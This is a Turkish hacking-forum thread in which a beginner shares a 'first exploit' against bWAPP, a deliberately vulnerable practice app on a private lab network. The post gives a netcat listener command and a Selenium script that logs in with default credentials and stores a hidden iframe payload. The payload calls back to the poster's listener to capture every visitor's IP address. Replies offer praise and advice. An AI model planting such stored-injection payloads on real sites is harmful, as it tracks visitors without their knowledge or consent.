• Yeni mesajlar

Menü

Giriş yap

---

Kayıt ol

---

Navigasyon

Uygulamayı yükle

Yükle

Daha fazla seçenek

Gündüz modu

Bize ulaşın

Kapat Menü

• Exploit Market
• Exploit Market

Çok eski bir web tarayıcısı kullanıyorsunuz. Bu veya diğer siteleri görüntülemekte sorunlar yaşayabilirsiniz..
Tarayıcınızı güncellemeli veya alternatif bir tarayıcı kullanmalısınız.

ilk exploitim

• Konbuyu başlatan yuathay
• Başlangıç tarihi 18 Eyl 2023

yuathay

Üye

7 Mar 2023

77

26

Değerlendirme - 0%

0   0   0

• 18 Eyl 2023

• #1

oncelikle​

nc -nvlp 8080​

komutunu yazdım ve 8080 portunu dinlemeye aldım​

from selenium import webdriver
from selenium.webdriver.common.by import By

browser=webdriver.Firefox()
browser.get("http://10.0.2.4/bWAPP")
browser.find_element(By.XPATH,"//*[@id='login']").send_keys('bee')
browser.find_element(By.XPATH,"//*[@id='password']").send_keys('bug')
browser.find_element(By.XPATH,"/html/body/div[2]/form/button").click()
browser.find_element(By.XPATH,"/html/body/div[8]/form/select").click()
browser.find_element(By.XPATH,"/html/body/div[8]/form/select/option[6]").click()
browser.find_element(By.XPATH,"/html/body/div[8]/form/button").click()
metin = browser.find_element(By.XPATH,"//*[@id='entry']")
metin.send_keys("<iframe src=http://10.0.2.9:8080 height='0' width='0'</iframe>")
düğme = browser.find_element(By.XPATH,"/html/body/div[2]/form/table/tbody/tr[2]/td[1]/button")
düğme.click()

​

yukarıdaki kod ile bwapp'e giris yaptım ardından "html injection stored blog" bolumune giriş yapıp oradaki kutucuğa :​

<iframe src=http://10.0.2.9:8080 height='0' width='0'</iframe>​

kodunu yazdım bu kod siteye giren herkesin ip adresini bana verecek ​

 

Arenklord

Anka Team Junior

9 Mar 2023

1,264

634

Tebriz

Değerlendirme - 0%

0   0   0

• 18 Eyl 2023

• #2

Eline sağlık

 

K

kerem000

Yeni üye

12 Ağu 2008

16

7

Değerlendirme - 0%

0   0   0

• 19 Eyl 2023

• #3

baslangıc seviyesi ise güzel olmus fakat böyle ip vermek vs eklenti islerine döndü ama tabi basarılı yinede daha farklı projeler yapman gerek artık dunyamız yapay zekaya dönüyor, biliyorsun onlar dahi exploit yazabiliyor hackerlık uzerınden degilde web ve devops uzerıne exp projeleri olusturursan kafanda daha da guzel seyler cıkarabilirsin emegine saglık

 

Cevap yazmak için giriş yap yada kayıt ol.

Paylaş:

Facebook Twitter Telegram Reddit E-posta Paylaş Link

• Exploit Market
• Exploit Market

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.